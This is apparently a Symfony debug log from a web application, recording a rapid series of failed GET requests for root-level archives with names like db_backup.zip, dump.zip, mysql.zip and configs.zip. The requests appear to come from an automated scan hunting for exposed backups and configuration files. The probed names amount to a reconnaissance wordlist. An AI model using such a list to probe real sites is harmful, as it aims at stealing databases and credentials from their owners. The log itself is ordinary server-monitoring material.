  7601. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /videos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /videos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7602. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /resources.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /resources.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7603. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7604. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7605. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7606. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /applications.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /applications.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7607. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /static.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /static.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7608. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7609. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7610. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rest.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rest.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7611. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /graphql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /graphql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7612. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /soap.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /soap.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7613. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /restapi.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /restapi.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7614. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /database.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /database.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7615. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /json.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /json.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7616. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /db_backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /db_backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7617. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /xml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /xml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7618. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /db.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /db.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7619. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dump.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dump.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7620. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7621. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbdump.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbdump.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7622. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgresql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgresql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7623. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rpc.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rpc.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7624. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqllite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqllite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7625. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbase.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbase.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7626. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mysql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mysql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7627. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7628. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cassandra.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cassandra.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7629. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /data.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /data.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7630. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /back_up.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /back_up.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7631. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgres.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgres.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7632. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_4.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_4.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7633. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /base.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /base.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7634. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mssql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mssql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7635. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7636. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_daily.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_daily.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7637. [2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /neo4j.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /neo4j.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7638. [2025-12-20 18:31:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7639. [2025-12-20 18:31:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7640. [2025-12-20 18:31:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_5.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_5.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7641. [2025-12-20 18:31:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configuration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configuration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7642. [2025-12-20 18:31:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /old.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /old.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7643. [2025-12-20 18:31:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ini.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ini.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
